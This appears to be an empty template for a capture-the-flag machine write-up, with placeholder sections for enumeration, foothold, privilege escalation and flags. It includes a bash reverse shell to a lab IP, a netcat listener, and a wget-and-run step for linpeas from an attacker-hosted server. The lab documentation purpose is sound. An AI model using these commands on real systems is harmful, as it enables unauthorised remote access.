Machine Information
| Property | Value |
|---|---|
| Name | |
| OS | Linux |
| Difficulty | Medium |
| IP | 10.10.11.x |
Summary
TL;DR
Brief one-paragraph summary of the box - what vulnerabilities were exploited and key techniques used.
Key Vulnerabilities:
- Vulnerability 1
- Vulnerability 2
- Vulnerability 3
Enumeration
Nmap Scan
Initial scan:
nmap -vv -T5 -p- *TARGET_IP*
nmap -vv -T5 -p*DISCOVERED_PORTS* -sC -sV *TARGET_IP*
Results:
| Port | Service | TCP/UDP |
|---|---|---|
| 22 | SSH | TCP |
Key findings:
- Service 1: Description
- Service 2: Description
Web Enumeration
Directory brute-forcing:
gobuster dir -u http://10.10.11.x -w /usr/share/wordlists/dirb/common.txt
Discovered endpoints:
- /admin - Admin panel
- /api - REST API
- /uploads - File upload directory
Technology stack:
- Framework:
- Language:
- Database:
Port XXX Enumeration
Initial Foothold
Vulnerability Discovery
Vulnerability: [Vulnerability Name]
Details
Explain the vulnerability - what it is, why it exists, how it works
Testing the vulnerability:
# Commands used to test/verify the vulnerability
Proof of Concept:
# Exploit code or script
import requests
url = "http://10.10.11.x/vulnerable-endpoint"
payload = {}
response = requests.post(url, data=payload)
print(response.text)
Exploitation
Step 1: [Action taken]
# Commands
Step 2: [Next action]
# Commands
Getting a shell:
# Reverse shell command
bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'
Listener:
nc -lvnp 4444
Shell
Successfully gained shell as [username]
User Flag
Stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
Enumerate the system:
whoami
id
uname -a
pwd
ls -la
User flag location:
cat /home/user/user.txt
flag{user_flag_here}
Privilege Escalation
Enumeration as [username]
Check sudo privileges:
sudo -l
Check for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Check for interesting files:
find / -name "*.conf" 2>/dev/null | grep -v "proc\|sys"
Running LinPEAS:
# On attacker machine
python3 -m http.server 8000
# On target
wget http://10.10.14.x:8000/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh
Lateral Movement (if applicable)
Discovery
Explanation of how to move laterally
Exploitation:
# Commands to switch users
Root Escalation
Vulnerability: [Escalation method]
Exploitation Path
Detailed explanation of the privilege escalation vulnerability
Exploitation steps:
Step 1:
# Command
Step 2:
# Command
Step 3:
# Command
Root Access
Successfully escalated privileges to root
Root Flag
whoami
# root
cat /root/root.txt
flag{root_flag_here}
Post-Exploitation
Flags:
- User: flag{user_flag_here}
- Root: flag{root_flag_here}
Tools Used
| Tool | Purpose | Command/Usage |
|---|---|---|
| nmap | Port scanning | nmap -sC -sV target |
| gobuster | Directory enumeration | gobuster dir -u URL -w wordlist |
| burpsuite | Web traffic analysis | Interactive |
| linpeas | Linux enumeration | ./linpeas.sh |
| custom exploit | Specific vulnerability | python3 exploit.py |
References
- Vulnerability Name - CVE-XXXX-XXXXX
- GTFOBins - Tool
- HackTricks - Technique
- OWASP - Vulnerability Type
Timeline
graph LR
A[Nmap Scan] --> B[Web Enum]
B --> C[Vuln Discovery]
C --> D[Initial Shell]
D --> E[User Flag]
E --> F[PrivEsc Enum]
F --> G[Root Shell]
G --> H[Root Flag]
Pwned on: [Date Here]
Difficulty Rating: ⭐⭐⭐⭐⭐ (Personal rating)
Fun Factor: ⭐⭐⭐⭐⭐ (How enjoyable was it?)